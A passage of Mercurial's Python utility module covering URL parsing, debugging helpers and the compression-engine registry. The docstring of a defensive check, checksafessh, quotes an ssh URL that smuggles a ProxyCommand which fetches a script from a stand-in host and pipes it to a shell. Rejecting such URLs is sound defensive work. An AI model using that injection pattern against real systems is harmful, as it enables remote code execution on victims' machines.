2569 2569 signal.signal(signal.SIGCHLD, prevhandler)
2570 2570
2571 2571 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2572 2572 """Return the result of interpolating items in the mapping into string s.
2573 2573
2574 2574 prefix is a single character string, or a two character string with
2575 2575 a backslash as the first character if the prefix needs to be escaped in
2576 2576 a regular expression.
2577 2577
2578 2578 fn is an optional function that will be applied to the replacement text
2579 2579 just before replacement.
2580 2580
2581 2581 escape_prefix is an optional flag that allows using doubled prefix for
2582 2582 its escaping.
2583 2583 """
2584 2584 fn = fn or (lambda s: s)
2585 2585 patterns = '|'.join(mapping.keys())
2586 2586 if escape_prefix:
2587 2587 patterns += '|' + prefix
2588 2588 if len(prefix) > 1:
2589 2589 prefix_char = prefix[1:]
2590 2590 else:
2591 2591 prefix_char = prefix
2592 2592 mapping[prefix_char] = prefix_char
2593 2593 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2594 2594 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2595 2595
2596 2596 def getport(port):
2597 2597 """Return the port for a given network service.
2598 2598
2599 2599 If port is an integer, it's returned as is. If it's a string, it's
2600 2600 looked up using socket.getservbyname(). If there's no matching
2601 2601 service, error.Abort is raised.
2602 2602 """
2603 2603 try:
2604 2604 return int(port)
2605 2605 except ValueError:
2606 2606 pass
2607 2607
2608 2608 try:
2609 2609 return socket.getservbyname(port)
2610 2610 except socket.error:
2611 2611 raise Abort(_("no port number associated with service '%s'") % port)
2612 2612
2613 2613 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2614 2614 '0': False, 'no': False, 'false': False, 'off': False,
2615 2615 'never': False}
2616 2616
2617 2617 def parsebool(s):
2618 2618 """Parse s into a boolean.
2619 2619
2620 2620 If s is not a valid boolean, returns None.
2621 2621 """
2622 2622 return _booleans.get(s.lower(), None)
2623 2623
2624 2624 _hextochr = dict((a + b, chr(int(a + b, 16)))
2625 2625 for a in string.hexdigits for b in string.hexdigits)
2626 2626
2627 2627 class url(object):
2628 2628 r"""Reliable URL parser.
2629 2629
2630 2630 This parses URLs and provides attributes for the following
2631 2631 components:
2632 2632
2633 2633 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2634 2634
2635 2635 Missing components are set to None. The only exception is
2636 2636 fragment, which is set to '' if present but empty.
2637 2637
2638 2638 If parsefragment is False, fragment is included in query. If
2639 2639 parsequery is False, query is included in path. If both are
2640 2640 False, both fragment and query are included in path.
2641 2641
2642 2642 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2643 2643
2644 2644 Note that for backward compatibility reasons, bundle URLs do not
2645 2645 take host names. That means 'bundle://../' has a path of '../'.
2646 2646
2647 2647 Examples:
2648 2648
2649 2649 >>> url('http://www.ietf.org/rfc/rfc2396.txt')
2650 2650 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2651 2651 >>> url('ssh://[::1]:2200//home/joe/repo')
2652 2652 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2653 2653 >>> url('file:///home/joe/repo')
2654 2654 <url scheme: 'file', path: '/home/joe/repo'>
2655 2655 >>> url('file:///c:/temp/foo/')
2656 2656 <url scheme: 'file', path: 'c:/temp/foo/'>
2657 2657 >>> url('bundle:foo')
2658 2658 <url scheme: 'bundle', path: 'foo'>
2659 2659 >>> url('bundle://../foo')
2660 2660 <url scheme: 'bundle', path: '../foo'>
2661 2661 >>> url(r'c:\foo\bar')
2662 2662 <url path: 'c:\\foo\\bar'>
2663 2663 >>> url(r'\\blah\blah\blah')
2664 2664 <url path: '\\\\blah\\blah\\blah'>
2665 2665 >>> url(r'\\blah\blah\blah#baz')
2666 2666 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2667 2667 >>> url(r'file:///C:\users\me')
2668 2668 <url scheme: 'file', path: 'C:\\users\\me'>
2669 2669
2670 2670 Authentication credentials:
2671 2671
2672 2672 >>> url('ssh://joe:xyz@x/repo')
2673 2673 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2674 2674 >>> url('ssh://joe@x/repo')
2675 2675 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2676 2676
2677 2677 Query strings and fragments:
2678 2678
2679 2679 >>> url('http://host/a?b#c')
2680 2680 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2681 2681 >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
2682 2682 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2683 2683
2684 2684 Empty path:
2685 2685
2686 2686 >>> url('')
2687 2687 <url path: ''>
2688 2688 >>> url('#a')
2689 2689 <url path: '', fragment: 'a'>
2690 2690 >>> url('http://host/')
2691 2691 <url scheme: 'http', host: 'host', path: ''>
2692 2692 >>> url('http://host/#a')
2693 2693 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2694 2694
2695 2695 Only scheme:
2696 2696
2697 2697 >>> url('http:')
2698 2698 <url scheme: 'http'>
2699 2699 """
2700 2700
2701 2701 _safechars = "!~*'()+"
2702 2702 _safepchars = "/!~*'()+:\\"
2703 2703 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2704 2704
2705 2705 def __init__(self, path, parsequery=True, parsefragment=True):
2706 2706 # We slowly chomp away at path until we have only the path left
2707 2707 self.scheme = self.user = self.passwd = self.host = None
2708 2708 self.port = self.path = self.query = self.fragment = None
2709 2709 self._localpath = True
2710 2710 self._hostport = ''
2711 2711 self._origpath = path
2712 2712
2713 2713 if parsefragment and '#' in path:
2714 2714 path, self.fragment = path.split('#', 1)
2715 2715
2716 2716 # special case for Windows drive letters and UNC paths
2717 2717 if hasdriveletter(path) or path.startswith('\\\\'):
2718 2718 self.path = path
2719 2719 return
2720 2720
2721 2721 # For compatibility reasons, we can't handle bundle paths as
2722 2722 # normal URLS
2723 2723 if path.startswith('bundle:'):
2724 2724 self.scheme = 'bundle'
2725 2725 path = path[7:]
2726 2726 if path.startswith('//'):
2727 2727 path = path[2:]
2728 2728 self.path = path
2729 2729 return
2730 2730
2731 2731 if self._matchscheme(path):
2732 2732 parts = path.split(':', 1)
2733 2733 if parts[0]:
2734 2734 self.scheme, path = parts
2735 2735 self._localpath = False
2736 2736
2737 2737 if not path:
2738 2738 path = None
2739 2739 if self._localpath:
2740 2740 self.path = ''
2741 2741 return
2742 2742 else:
2743 2743 if self._localpath:
2744 2744 self.path = path
2745 2745 return
2746 2746
2747 2747 if parsequery and '?' in path:
2748 2748 path, self.query = path.split('?', 1)
2749 2749 if not path:
2750 2750 path = None
2751 2751 if not self.query:
2752 2752 self.query = None
2753 2753
2754 2754 # // is required to specify a host/authority
2755 2755 if path and path.startswith('//'):
2756 2756 parts = path[2:].split('/', 1)
2757 2757 if len(parts) > 1:
2758 2758 self.host, path = parts
2759 2759 else:
2760 2760 self.host = parts[0]
2761 2761 path = None
2762 2762 if not self.host:
2763 2763 self.host = None
2764 2764 # path of file:///d is /d
2765 2765 # path of file:///d:/ is d:/, not /d:/
2766 2766 if path and not hasdriveletter(path):
2767 2767 path = '/' + path
2768 2768
2769 2769 if self.host and '@' in self.host:
2770 2770 self.user, self.host = self.host.rsplit('@', 1)
2771 2771 if ':' in self.user:
2772 2772 self.user, self.passwd = self.user.split(':', 1)
2773 2773 if not self.host:
2774 2774 self.host = None
2775 2775
2776 2776 # Don't split on colons in IPv6 addresses without ports
2777 2777 if (self.host and ':' in self.host and
2778 2778 not (self.host.startswith('[') and self.host.endswith(']'))):
2779 2779 self._hostport = self.host
2780 2780 self.host, self.port = self.host.rsplit(':', 1)
2781 2781 if not self.host:
2782 2782 self.host = None
2783 2783
2784 2784 if (self.host and self.scheme == 'file' and
2785 2785 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2786 2786 raise Abort(_('file:// URLs can only refer to localhost'))
2787 2787
2788 2788 self.path = path
2789 2789
2790 2790 # leave the query string escaped
2791 2791 for a in ('user', 'passwd', 'host', 'port',
2792 2792 'path', 'fragment'):
2793 2793 v = getattr(self, a)
2794 2794 if v is not None:
2795 2795 setattr(self, a, urlreq.unquote(v))
2796 2796
2797 2797 def __repr__(self):
2798 2798 attrs = []
2799 2799 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2800 2800 'query', 'fragment'):
2801 2801 v = getattr(self, a)
2802 2802 if v is not None:
2803 2803 attrs.append('%s: %r' % (a, v))
2804 2804 return '<url %s>' % ', '.join(attrs)
2805 2805
2806 2806 def __bytes__(self):
2807 2807 r"""Join the URL's components back into a URL string.
2808 2808
2809 2809 Examples:
2810 2810
2811 2811 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2812 2812 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2813 2813 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2814 2814 'http://user:pw@host:80/?foo=bar&baz=42'
2815 2815 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2816 2816 'http://user:pw@host:80/?foo=bar%3dbaz'
2817 2817 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2818 2818 'ssh://user:pw@[::1]:2200//home/joe#'
2819 2819 >>> str(url('http://localhost:80//'))
2820 2820 'http://localhost:80//'
2821 2821 >>> str(url('http://localhost:80/'))
2822 2822 'http://localhost:80/'
2823 2823 >>> str(url('http://localhost:80'))
2824 2824 'http://localhost:80/'
2825 2825 >>> str(url('bundle:foo'))
2826 2826 'bundle:foo'
2827 2827 >>> str(url('bundle://../foo'))
2828 2828 'bundle:../foo'
2829 2829 >>> str(url('path'))
2830 2830 'path'
2831 2831 >>> str(url('file:///tmp/foo/bar'))
2832 2832 'file:///tmp/foo/bar'
2833 2833 >>> str(url('file:///c:/tmp/foo/bar'))
2834 2834 'file:///c:/tmp/foo/bar'
2835 2835 >>> print url(r'bundle:foo\bar')
2836 2836 bundle:foo\bar
2837 2837 >>> print url(r'file:///D:\data\hg')
2838 2838 file:///D:\data\hg
2839 2839 """
2840 2840 if self._localpath:
2841 2841 s = self.path
2842 2842 if self.scheme == 'bundle':
2843 2843 s = 'bundle:' + s
2844 2844 if self.fragment:
2845 2845 s += '#' + self.fragment
2846 2846 return s
2847 2847
2848 2848 s = self.scheme + ':'
2849 2849 if self.user or self.passwd or self.host:
2850 2850 s += '//'
2851 2851 elif self.scheme and (not self.path or self.path.startswith('/')
2852 2852 or hasdriveletter(self.path)):
2853 2853 s += '//'
2854 2854 if hasdriveletter(self.path):
2855 2855 s += '/'
2856 2856 if self.user:
2857 2857 s += urlreq.quote(self.user, safe=self._safechars)
2858 2858 if self.passwd:
2859 2859 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2860 2860 if self.user or self.passwd:
2861 2861 s += '@'
2862 2862 if self.host:
2863 2863 if not (self.host.startswith('[') and self.host.endswith(']')):
2864 2864 s += urlreq.quote(self.host)
2865 2865 else:
2866 2866 s += self.host
2867 2867 if self.port:
2868 2868 s += ':' + urlreq.quote(self.port)
2869 2869 if self.host:
2870 2870 s += '/'
2871 2871 if self.path:
2872 2872 # TODO: similar to the query string, we should not unescape the
2873 2873 # path when we store it, the path might contain '%2f' = '/',
2874 2874 # which we should *not* escape.
2875 2875 s += urlreq.quote(self.path, safe=self._safepchars)
2876 2876 if self.query:
2877 2877 # we store the query in escaped form.
2878 2878 s += '?' + self.query
2879 2879 if self.fragment is not None:
2880 2880 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2881 2881 return s
2882 2882
2883 2883 __str__ = encoding.strmethod(__bytes__)
2884 2884
2885 2885 def authinfo(self):
2886 2886 user, passwd = self.user, self.passwd
2887 2887 try:
2888 2888 self.user, self.passwd = None, None
2889 2889 s = bytes(self)
2890 2890 finally:
2891 2891 self.user, self.passwd = user, passwd
2892 2892 if not self.user:
2893 2893 return (s, None)
2894 2894 # authinfo[1] is passed to urllib2 password manager, and its
2895 2895 # URIs must not contain credentials. The host is passed in the
2896 2896 # URIs list because Python < 2.4.3 uses only that to search for
2897 2897 # a password.
2898 2898 return (s, (None, (s, self.host),
2899 2899 self.user, self.passwd or ''))
2900 2900
2901 2901 def isabs(self):
2902 2902 if self.scheme and self.scheme != 'file':
2903 2903 return True # remote URL
2904 2904 if hasdriveletter(self.path):
2905 2905 return True # absolute for our purposes - can't be joined()
2906 2906 if self.path.startswith(br'\\'):
2907 2907 return True # Windows UNC path
2908 2908 if self.path.startswith('/'):
2909 2909 return True # POSIX-style
2910 2910 return False
2911 2911
2912 2912 def localpath(self):
2913 2913 if self.scheme == 'file' or self.scheme == 'bundle':
2914 2914 path = self.path or '/'
2915 2915 # For Windows, we need to promote hosts containing drive
2916 2916 # letters to paths with drive letters.
2917 2917 if hasdriveletter(self._hostport):
2918 2918 path = self._hostport + '/' + self.path
2919 2919 elif (self.host is not None and self.path
2920 2920 and not hasdriveletter(path)):
2921 2921 path = '/' + path
2922 2922 return path
2923 2923 return self._origpath
2924 2924
2925 2925 def islocal(self):
2926 2926 '''whether localpath will return something that posixfile can open'''
2927 2927 return (not self.scheme or self.scheme == 'file'
2928 2928 or self.scheme == 'bundle')
2929 2929
2930 2930 def hasscheme(path):
2931 2931 return bool(url(path).scheme)
2932 2932
2933 2933 def hasdriveletter(path):
2934 2934 return path and path[1:2] == ':' and path[0:1].isalpha()
2935 2935
2936 2936 def urllocalpath(path):
2937 2937 return url(path, parsequery=False, parsefragment=False).localpath()
2938 2938
2939 2939 def checksafessh(path):
2940 2940 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2941 2941
2942 2942 This is a sanity check for ssh urls. ssh will parse the first item as
2943 2943 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2944 2944 Let's prevent these potentially exploited urls entirely and warn the
2945 2945 user.
2946 2946
2947 2947 Raises an error.Abort when the url is unsafe.
2948 2948 """
2949 2949 path = urlreq.unquote(path)
2950 2950 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2951 2951 raise error.Abort(_('potentially unsafe url: %r') %
2952 2952 (path,))
2953 2953
2954 2954 def hidepassword(u):
2955 2955 '''hide user credential in a url string'''
2956 2956 u = url(u)
2957 2957 if u.passwd:
2958 2958 u.passwd = '***'
2959 2959 return bytes(u)
2960 2960
2961 2961 def removeauth(u):
2962 2962 '''remove all authentication information from a url string'''
2963 2963 u = url(u)
2964 2964 u.user = u.passwd = None
2965 2965 return str(u)
2966 2966
2967 2967 timecount = unitcountfn(
2968 2968 (1, 1e3, _('%.0f s')),
2969 2969 (100, 1, _('%.1f s')),
2970 2970 (10, 1, _('%.2f s')),
2971 2971 (1, 1, _('%.3f s')),
2972 2972 (100, 0.001, _('%.1f ms')),
2973 2973 (10, 0.001, _('%.2f ms')),
2974 2974 (1, 0.001, _('%.3f ms')),
2975 2975 (100, 0.000001, _('%.1f us')),
2976 2976 (10, 0.000001, _('%.2f us')),
2977 2977 (1, 0.000001, _('%.3f us')),
2978 2978 (100, 0.000000001, _('%.1f ns')),
2979 2979 (10, 0.000000001, _('%.2f ns')),
2980 2980 (1, 0.000000001, _('%.3f ns')),
2981 2981 )
2982 2982
2983 2983 _timenesting = [0]
2984 2984
2985 2985 def timed(func):
2986 2986 '''Report the execution time of a function call to stderr.
2987 2987
2988 2988 During development, use as a decorator when you need to measure
2989 2989 the cost of a function, e.g. as follows:
2990 2990
2991 2991 @util.timed
2992 2992 def foo(a, b, c):
2993 2993 pass
2994 2994 '''
2995 2995
2996 2996 def wrapper(*args, **kwargs):
2997 2997 start = timer()
2998 2998 indent = 2
2999 2999 _timenesting[0] += indent
3000 3000 try:
3001 3001 return func(*args, **kwargs)
3002 3002 finally:
3003 3003 elapsed = timer() - start
3004 3004 _timenesting[0] -= indent
3005 3005 stderr.write('%s%s: %s\n' %
3006 3006 (' ' * _timenesting[0], func.__name__,
3007 3007 timecount(elapsed)))
3008 3008 return wrapper
3009 3009
3010 3010 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3011 3011 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3012 3012
3013 3013 def sizetoint(s):
3014 3014 '''Convert a space specifier to a byte count.
3015 3015
3016 3016 >>> sizetoint('30')
3017 3017 30
3018 3018 >>> sizetoint('2.2kb')
3019 3019 2252
3020 3020 >>> sizetoint('6M')
3021 3021 6291456
3022 3022 '''
3023 3023 t = s.strip().lower()
3024 3024 try:
3025 3025 for k, u in _sizeunits:
3026 3026 if t.endswith(k):
3027 3027 return int(float(t[:-len(k)]) * u)
3028 3028 return int(t)
3029 3029 except ValueError:
3030 3030 raise error.ParseError(_("couldn't parse size: %s") % s)
3031 3031
3032 3032 class hooks(object):
3033 3033 '''A collection of hook functions that can be used to extend a
3034 3034 function's behavior. Hooks are called in lexicographic order,
3035 3035 based on the names of their sources.'''
3036 3036
3037 3037 def __init__(self):
3038 3038 self._hooks = []
3039 3039
3040 3040 def add(self, source, hook):
3041 3041 self._hooks.append((source, hook))
3042 3042
3043 3043 def __call__(self, *args):
3044 3044 self._hooks.sort(key=lambda x: x[0])
3045 3045 results = []
3046 3046 for source, hook in self._hooks:
3047 3047 results.append(hook(*args))
3048 3048 return results
3049 3049
3050 3050 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3051 3051 '''Yields lines for a nicely formatted stacktrace.
3052 3052 Skips the 'skip' last entries, then return the last 'depth' entries.
3053 3053 Each file+linenumber is formatted according to fileline.
3054 3054 Each line is formatted according to line.
3055 3055 If line is None, it yields:
3056 3056 length of longest filepath+line number,
3057 3057 filepath+linenumber,
3058 3058 function
3059 3059
3060 3060 Not be used in production code but very convenient while developing.
3061 3061 '''
3062 3062 entries = [(fileline % (fn, ln), func)
3063 3063 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3064 3064 ][-depth:]
3065 3065 if entries:
3066 3066 fnmax = max(len(entry[0]) for entry in entries)
3067 3067 for fnln, func in entries:
3068 3068 if line is None:
3069 3069 yield (fnmax, fnln, func)
3070 3070 else:
3071 3071 yield line % (fnmax, fnln, func)
3072 3072
3073 3073 def debugstacktrace(msg='stacktrace', skip=0,
3074 3074 f=stderr, otherf=stdout, depth=0):
3075 3075 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3076 3076 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3077 3077 By default it will flush stdout first.
3078 3078 It can be used everywhere and intentionally does not require an ui object.
3079 3079 Not be used in production code but very convenient while developing.
3080 3080 '''
3081 3081 if otherf:
3082 3082 otherf.flush()
3083 3083 f.write('%s at:\n' % msg.rstrip())
3084 3084 for line in getstackframes(skip + 1, depth=depth):
3085 3085 f.write(line)
3086 3086 f.flush()
3087 3087
3088 3088 class dirs(object):
3089 3089 '''a multiset of directory names from a dirstate or manifest'''
3090 3090
3091 3091 def __init__(self, map, skip=None):
3092 3092 self._dirs = {}
3093 3093 addpath = self.addpath
3094 3094 if safehasattr(map, 'iteritems') and skip is not None:
3095 3095 for f, s in map.iteritems():
3096 3096 if s[0] != skip:
3097 3097 addpath(f)
3098 3098 else:
3099 3099 for f in map:
3100 3100 addpath(f)
3101 3101
3102 3102 def addpath(self, path):
3103 3103 dirs = self._dirs
3104 3104 for base in finddirs(path):
3105 3105 if base in dirs:
3106 3106 dirs[base] += 1
3107 3107 return
3108 3108 dirs[base] = 1
3109 3109
3110 3110 def delpath(self, path):
3111 3111 dirs = self._dirs
3112 3112 for base in finddirs(path):
3113 3113 if dirs[base] > 1:
3114 3114 dirs[base] -= 1
3115 3115 return
3116 3116 del dirs[base]
3117 3117
3118 3118 def __iter__(self):
3119 3119 return iter(self._dirs)
3120 3120
3121 3121 def __contains__(self, d):
3122 3122 return d in self._dirs
3123 3123
3124 3124 if safehasattr(parsers, 'dirs'):
3125 3125 dirs = parsers.dirs
3126 3126
3127 3127 def finddirs(path):
3128 3128 pos = path.rfind('/')
3129 3129 while pos != -1:
3130 3130 yield path[:pos]
3131 3131 pos = path.rfind('/', 0, pos)
3132 3132
3133 3133 # compression code
3134 3134
3135 3135 SERVERROLE = 'server'
3136 3136 CLIENTROLE = 'client'
3137 3137
3138 3138 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3139 3139 (u'name', u'serverpriority',
3140 3140 u'clientpriority'))
3141 3141
3142 3142 class compressormanager(object):
3143 3143 """Holds registrations of various compression engines.
3144 3144
3145 3145 This class essentially abstracts the differences between compression
3146 3146 engines to allow new compression formats to be added easily, possibly from
3147 3147 extensions.
3148 3148
3149 3149 Compressors are registered against the global instance by calling its
3150 3150 ``register()`` method.
3151 3151 """
3152 3152 def __init__(self):
3153 3153 self._engines = {}
3154 3154 # Bundle spec human name to engine name.
3155 3155 self._bundlenames = {}
3156 3156 # Internal bundle identifier to engine name.
3157 3157 self._bundletypes = {}
3158 3158 # Revlog header to engine name.
3159 3159 self._revlogheaders = {}
3160 3160 # Wire proto identifier to engine name.
3161 3161 self._wiretypes = {}
3162 3162
3163 3163 def __getitem__(self, key):
3164 3164 return self._engines[key]
3165 3165
3166 3166 def __contains__(self, key):
3167 3167 return key in self._engines
3168 3168
3169 3169 def __iter__(self):
3170 3170 return iter(self._engines.keys())
3171 3171
3172 3172 def register(self, engine):
3173 3173 """Register a compression engine with the manager.
3174 3174
3175 3175 The argument must be a ``compressionengine`` instance.
3176 3176 """
3177 3177 if not isinstance(engine, compressionengine):
3178 3178 raise ValueError(_('argument must be a compressionengine'))
3179 3179
3180 3180 name = engine.name()
3181 3181
3182 3182 if name in self._engines:
3183 3183 raise error.Abort(_('compression engine %s already registered') %
3184 3184 name)
3185 3185
3186 3186 bundleinfo = engine.bundletype()
3187 3187 if bundleinfo:
3188 3188 bundlename, bundletype = bundleinfo
3189 3189
3190 3190 if bundlename in self._bundlenames:
3191 3191 raise error.Abort(_('bundle name %s already registered') %
3192 3192 bundlename)
3193 3193 if bundletype in self._bundletypes:
3194 3194 raise error.Abort(_('bundle type %s already registered by %s') %
3195 3195 (bundletype, self._bundletypes[bundletype]))
3196 3196
3197 3197 # No external facing name declared.
3198 3198 if bundlename:
3199 3199 self._bundlenames[bundlename] = name
3200 3200
3201 3201 self._bundletypes[bundletype] = name
3202 3202
3203 3203 wiresupport = engine.wireprotosupport()
3204 3204 if wiresupport:
3205 3205 wiretype = wiresupport.name
3206 3206 if wiretype in self._wiretypes:
3207 3207 raise error.Abort(_('wire protocol compression %s already '
3208 3208 'registered by %s') %
3209 3209 (wiretype, self._wiretypes[wiretype]))
3210 3210
3211 3211 self._wiretypes[wiretype] = name
3212 3212
3213 3213 revlogheader = engine.revlogheader()
3214 3214 if revlogheader and revlogheader in self._revlogheaders:
3215 3215 raise error.Abort(_('revlog header %s already registered by %s') %
3216 3216 (revlogheader, self._revlogheaders[revlogheader]))
3217 3217
3218 3218 if revlogheader:
3219 3219 self._revlogheaders[revlogheader] = name
3220 3220
3221 3221 self._engines[name] = engine
3222 3222
3223 3223 @property
3224 3224 def supportedbundlenames(self):
3225 3225 return set(self._bundlenames.keys())
3226 3226
3227 3227 @property
3228 3228 def supportedbundletypes(self):
3229 3229 return set(self._bundletypes.keys())
3230 3230
3231 3231 def forbundlename(self, bundlename):
3232 3232 """Obtain a compression engine registered to a bundle name.
3233 3233
3234 3234 Will raise KeyError if the bundle type isn't registered.
3235 3235
3236 3236 Will abort if the engine is known but not available.
3237 3237 """
3238 3238 engine = self._engines[self._bundlenames[bundlename]]
3239 3239 if not engine.available():
3240 3240 raise error.Abort(_('compression engine %s could not be loaded') %
3241 3241 engine.name())
3242 3242 return engine
3243 3243
3244 3244 def forbundletype(self, bundletype):
3245 3245 """Obtain a compression engine registered to a bundle type.
3246 3246
3247 3247 Will raise KeyError if the bundle type isn't registered.
3248 3248
3249 3249 Will abort if the engine is known but not available.
3250 3250 """
3251 3251 engine = self._engines[self._bundletypes[bundletype]]
3252 3252 if not engine.available():
3253 3253 raise error.Abort(_('compression engine %s could not be loaded') %
3254 3254 engine.name())
3255 3255 return engine
3256 3256
3257 3257 def supportedwireengines(self, role, onlyavailable=True):
3258 3258 """Obtain compression engines that support the wire protocol.
3259 3259
3260 3260 Returns a list of engines in prioritized order, most desired first.
3261 3261
3262 3262 If ``onlyavailable`` is set, filter out engines that can't be
3263 3263 loaded.
3264 3264 """
3265 3265 assert role in (SERVERROLE, CLIENTROLE)
3266 3266
3267 3267 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3268 3268
3269 3269 engines = [self._engines[e] for e in self._wiretypes.values()]
3270 3270 if onlyavailable:
3271 3271 engines = [e for e in engines if e.available()]
3272 3272
3273 3273 def getkey(e):
3274 3274 # Sort first by priority, highest first. In case of tie, sort
3275 3275 # alphabetically. This is arbitrary, but ensures output is
3276 3276 # stable.
3277 3277 w = e.wireprotosupport()
3278 3278 return -1 * getattr(w, attr), w.name
3279 3279
3280 3280 return list(sorted(engines, key=getkey))
3281 3281
3282 3282 def forwiretype(self, wiretype):
3283 3283 engine = self._engines[self._wiretypes[wiretype]]
3284 3284 if not engine.available():
3285 3285 raise error.Abort(_('compression engine %s could not be loaded') %
3286 3286 engine.name())
3287 3287 return engine
3288 3288
3289 3289 def forrevlogheader(self, header):
3290 3290 """Obtain a compression engine registered to a revlog header.
3291 3291
3292 3292 Will raise KeyError if the revlog header value isn't registered.
3293 3293 """
3294 3294 return self._engines[self._revlogheaders[header]]
3295 3295
3296 3296 compengines = compressormanager()
3297 3297
3298 3298 class compressionengine(object):
3299 3299 """Base class for compression engines.
3300 3300
3301 3301 Compression engines must implement the interface defined by this class.
3302 3302 """
3303 3303 def name(self):
3304 3304 """Returns the name of the compression engine.
3305 3305
3306 3306 This is the key the engine is registered under.
3307 3307
3308 3308 This method must be implemented.
3309 3309 """
3310 3310 raise NotImplementedError()
3311 3311
3312 3312 def available(self):
3313 3313 """Whether the compression engine is available.
3314 3314
3315 3315 The intent of this method is to allow optional compression engines
3316 3316 that may not be available in all installations (such as engines relying
3317 3317 on C extensions that may not be present).
3318 3318 """
3319 3319 return True
3320 3320
3321 3321 def bundletype(self):
3322 3322 """Describes bundle identifiers for this engine.
3323 3323
3324 3324 If this compression engine isn't supported for bundles, returns None.
3325 3325
3326 3326 If this engine can be used for bundles, returns a 2-tuple of strings of
3327 3327 the user-facing "bundle spec" compression name and an internal
3328 3328 identifier used to denote the compression format within bundles. To
3329 3329 exclude the name from external usage, set the first element to ``None``.
3330 3330
3331 3331 If bundle compression is supported, the class must also implement
3332 3332 ``compressstream`` and `decompressorreader``.
3333 3333
3334 3334 The docstring of this method is used in the help system to tell users
3335 3335 about this engine.
3336 3336 """
3337 3337 return None
3338 3338
3339 3339 def wireprotosupport(self):
3340 3340 """Declare support for this compression format on the wire protocol.
3341 3341
3342 3342 If this compression engine isn't supported for compressing wire
3343 3343 protocol payloads, returns None.
3344 3344
3345 3345 Otherwise, returns ``compenginewireprotosupport`` with the following
3346 3346 fields:
3347 3347
3348 3348 * String format identifier
3349 3349 * Integer priority for the server
3350 3350 * Integer priority for the client
3351 3351
3352 3352 The integer priorities are used to order the advertisement of format
3353 3353 support by server and client. The highest integer is advertised
3354 3354 first. Integers with non-positive values aren't advertised.
3355 3355
3356 3356 The priority values are somewhat arbitrary and only used for default
3357 3357 ordering. The relative order can be changed via config options.
3358 3358
3359 3359 If wire protocol compression is supported, the class must also implement
3360 3360 ``compressstream`` and ``decompressorreader``.
3361 3361 """
3362 3362 return None
3363 3363
3364 3364 def revlogheader(self):
3365 3365 """Header added to revlog chunks that identifies this engine.
3366 3366
3367 3367 If this engine can be used to compress revlogs, this method should
3368 3368 return the bytes used to identify chunks compressed with this engine.
3369 3369 Else, the method should return ``None`` to indicate it does not
3370 3370 participate in revlog compression.
3371 3371 """
3372 3372 return None
3373 3373
3374 3374 def compressstream(self, it, opts=None):
3375 3375 """Compress an iterator of chunks.
3376 3376
3377 3377 The method receives an iterator (ideally a generator) of chunks of
3378 3378 bytes to be compressed. It returns an iterator (ideally a generator)
3379 3379 of bytes of chunks representing the compressed output.
3380 3380
3381 3381 Optionally accepts an argument defining how to perform compression.
3382 3382 Each engine treats this argument differently.
3383 3383 """
3384 3384 raise NotImplementedError()
3385 3385
3386 3386 def decompressorreader(self, fh):
3387 3387 """Perform decompression on a file object.
3388 3388
3389 3389 Argument is an object with a ``read(size)`` method that returns
3390 3390 compressed data. Return value is an object with a ``read(size)`` that
3391 3391 returns uncompressed data.
3392 3392 """
3393 3393 raise NotImplementedError()
3394 3394
3395 3395 def revlogcompressor(self, opts=None):
3396 3396 """Obtain an object that can be used to compress revlog entries.
3397 3397
3398 3398 The object has a ``compress(data)`` method that compresses binary
3399 3399 data. This method returns compressed binary data or ``None`` if
3400 3400 the data could not be compressed (too small, not compressible, etc).
3401 3401 The returned data should have a header uniquely identifying this
3402 3402 compression format so decompression can be routed to this engine.
3403 3403 This header should be identified by the ``revlogheader()`` return
3404 3404 value.
3405 3405
3406 3406 The object has a ``decompress(data)`` method that decompresses
3407 3407 data. The method will only be called if ``data`` begins with
3408 3408 ``revlogheader()``. The method should return the raw, uncompressed
3409 3409 data or raise a ``RevlogError``.
3410 3410
3411 3411 The object is reusable but is not thread safe.
3412 3412 """
3413 3413 raise NotImplementedError()
3414 3414
3415 3415 class _zlibengine(compressionengine):
3416 3416 def name(self):
3417 3417 return 'zlib'
3418 3418
3419 3419 def bundletype(self):
3420 3420 """zlib compression using the DEFLATE algorithm.
3421 3421
3422 3422 All Mercurial clients should support this format. The compression
3423 3423 algorithm strikes a reasonable balance between compression ratio
3424 3424 and size.
3425 3425 """
3426 3426 return 'gzip', 'GZ'
3427 3427
3428 3428 def wireprotosupport(self):
